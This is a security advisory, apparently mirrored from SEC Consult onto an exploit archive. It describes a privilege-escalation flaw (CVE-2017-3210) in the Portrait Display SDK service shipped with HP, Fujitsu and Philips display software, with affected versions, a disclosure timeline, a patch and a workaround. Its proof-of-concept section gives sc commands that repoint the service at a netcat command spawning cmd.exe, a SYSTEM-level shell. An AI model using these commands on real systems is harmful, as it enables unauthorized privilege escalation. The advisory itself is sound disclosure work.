Portrait Display SDK Service Privilege Escalation Vulnerability

2017-04-26T00:00:00
ID 1337DAY-ID-27686
Type zdt
Reporter Schober
Modified 2017-04-26T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            title: Privilege Escalation due to insecure service configuration
            product: Portrait Display SDK Service
 vulnerable version: mutliple, see PoC
      fixed version: multiple, see solution
         CVE number: CVE-2017-3210
             impact: critical
           homepage: http://www.portrait.com/
              found: 2017-02-23
                 by: W. Schober (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"For nearly 20 years, Portrait Displays has provided customized software to
OEM monitor manufacturers across the globe. We develop tailored solutions,
encompassing the needs of todayas changing marketplace.

Our technologies allow OEMs to provide their end users with a premium
interactive experience. Our engineers work hand-in-hand with leading OEMS,
ODMs, and GPU and scaler companies, to develop and implement cutting-edge
software solutions."

Source: http://www.portrait.com/technology.html


Business recommendation:
------------------------
SEC Consult recommends not to use this service in a production environment
until a thorough security review has been performed by security professionals
and all identified issues have been resolved.


Vulnerability overview/description:
-----------------------------------
The Portrait Display SDK Service (PdiService.exe) configuration was found to
be writable for every authenticated user in a default installation. This would
allow an attacker to execute arbitrary code, elevate his privileges and gain a
shell with the privileges of the SYSTEM user.

The Portrait Display SDK Service is used in various different OEM software,
which is shipped per default on a wide range of notebooks. The software, where
the SDK is included is used as an virtual OSD (On Screen Display) for "tuning"
displays, setting gamma values, changing color values etc.

The vulnerability was identified in the software "DisplayView Click" from
Fujitsu. Due to the fact, that this SDK is used in several software packages,
SEC Consult tried to identify other potential vulnerable software packages,
which got rebranded by Portrait Displays, Inc. The following list contains an
excerpt of packages containing the SDK, which are partially installed per
default on
notebooks of HP, Philips,Fujitsu, etc.


-) Fujitsu DisplayView Click v5
-) Fujitsu DisplayView Click v6
-) HP Display Assistant
-) HP Display Control
-) HP Mobile Display Assistant v1
-) HP Mobile Display Assistant v2
-) HP My Display
-) HP My Display All-In-One/TouchSmart
-) HP Picture in Picture
-) Philips SmartControl II
-) Philips SmartControl Lite
-) Philips SmartControl Premium


Portait Displays Inc. confirmed that at least the following packages are
vulnerable:

Fujitsu DisplayView Click
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01
build id:  dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite  Version 5
build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id:
dtune-fus-R2017-04-01-1212-32

HP Display Assistant  Version 2.1
build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id:  dtune-hwp-R2013-10-11-1504-22
and above

HP My Display  Version 2.01
build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id:  dtune-hpc-R2014-06-27-1655-15 and
above

Philips Smart Control Premium
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07

Furthermore, a more detailed summary of this advisory has been published at our
blog:
http://blog.sec-consult.com/2017/04/what-unites-hp-philips-and-fujitsu-one.html

Proof of concept:
-----------------
To identify the permissions of the service the builtin Windows command "sc" was
used. The output of the command for the vulnerable service can be seen below:

  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
  (A;;CCLCSWRPWPDTLOCRRC;;;SY)
  (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
  (A;;CCLCSWLOCRRC;;;IU)
  (A;;CCLCSWLOCRRC;;;SU)

By "converting" the Security Descriptor Definition Language into human readable
words, SEC Consult was able to identify the following permissions for the
PdiService:

  RW NT AUTHORITY\Authenticated Users
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  NT AUTHORITY\INTERACTIVE
  R  NT AUTHORITY\SERVICE

Due to the fact, that every authenticated user has write access on the service,
an attacker is able to execute arbitrary code by changing the services binary
path. Moreover, all Windows services are executed with SYSTEM permissions,
resulting in privilege escalation.

The workflow to execute arbitrary code is as follows:
1) Stop Service
   sc stop pdiservice
2) Alter service binary path
   sc config pdiservice binpath= "C:\nc.exe -nv 127.0.0.1 4242 -e
C:\WINDOWS\System32\cmd.exe"
3) Start Service
   sc start pdiservice


Vulnerable / tested versions:
-----------------------------
The following list contains all vulnerable versions:

Fujitsu DisplayView Click
Version 6.0 build id: dtune-fts-R2014-04-22-1630-07, 6.01
build id:  dtune-fts-R2014-05-13-1436-35
The issue was fixed in Version 6.3 build id: dtune-fts-R2016-03-07-1133-51

Fujitsu DisplayView Click Suite  Version 5
build id: dtune-fus-R2012-09-26-1056-32
The issue is addressed by patch in Version 5.9 build id:
dtune-fus-R2017-04-01-1212-32

HP Display Assistant  Version 2.1
build id: dtune-hwp-R2012-10-31-1329-38
The issue was fixed in Version 2.11 build id:  dtune-hwp-R2013-10-11-1504-22
and above

HP My Display  Version 2.01
build id: dtune-hpc-R2013-01-10-1507-17
The issue was fixed in Version 2.1 build id:  dtune-hpc-R2014-06-27-1655-15 and
above

Philips Smart Control Premium
Versions with issue: 2.23 build id: dtune-plp-R2013-08-12-1215-13, 2.25
build id: dtune-plp-R2014-08-29-1016-05
The issue was fixed in Version 2.26 build id: dtune-plp-R2014-11-14-1813-07


Vendor contact timeline:
------------------------
2017-03-01: Contacting vendor through email [email protected]
2017-03-01: Informing CERT/CC, asking for coordination support regarding HW
            vendors, assigned VU#219739
2017-03-01: The vendor responds and requests all attachments as plaintext in
            the email body because they are not allowed to open any attachements
            from "unknown parties".
            Therefore SEC Consult sends the PGP Public Keys as plaintext in the
            body of the email.
2017-03-08: Contacting vendor again on how to transmit the advisory; no answer
2017-03-15: Informing CERT/CC about the status, asking for support to contact
            the vendor
2017-03-16: The Vendor provides a public key for encrypted communication;
            The advisory got securely transmitted to the vendor.
2017-03-18: The vendor responds and confirms that they were able to reproduce
            the vulnerability. Detailed information, on which Brands are
            affected, as well as a timeline for an update will be provided next
            week.
2017-03-28: Requesting update from Portrait Displays Inc. Asking about current
            state and a list of affected vendors.
2017-03-29: Vendors responds that they are still in the process of evaluating
            on, which 3rd parties are affected.
2017-04-06: Vendor updates us with information about the planed release schedule
            and affected vendors.  Portrait is still in the progress of
            evaluating on, which3rd parties are affected. The list should be
            available at the end of the week. A patch that removes the invalid
            permission will be available on the vendors website.
2017-04-17: Vendor provides us with a detailed list of affected products.
2017-04-18: Vendor publicly releases a patch for the vulnerability on their
            website (http://www.portrait.com/securityupdate.html)
2017-04-21: SEC Consult requests a CVE from CERT/CC and coordinates the
            disclosure of the CERT VU and the SEC Consult advisory.
2017-04-25: Public release.

Solution:
---------
Since the 18th of April 2017 a patch is available.
See: http://www.portrait.com/securityupdate.html

Workaround:
-----------
To quickly get rid of the vulnerability, the permissions of the service should
be altered with the built-in windows command "sc". To completely remove the
permissions of the "Authenticated Users" group, the following command can be
used:

sc sdset pdiservice
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)
(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)

This will result in the following set of permissions:
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
  R  NT AUTHORITY\INTERACTIVE
  R  NT AUTHORITY\SERVICE

#  0day.today [2018-03-19]  #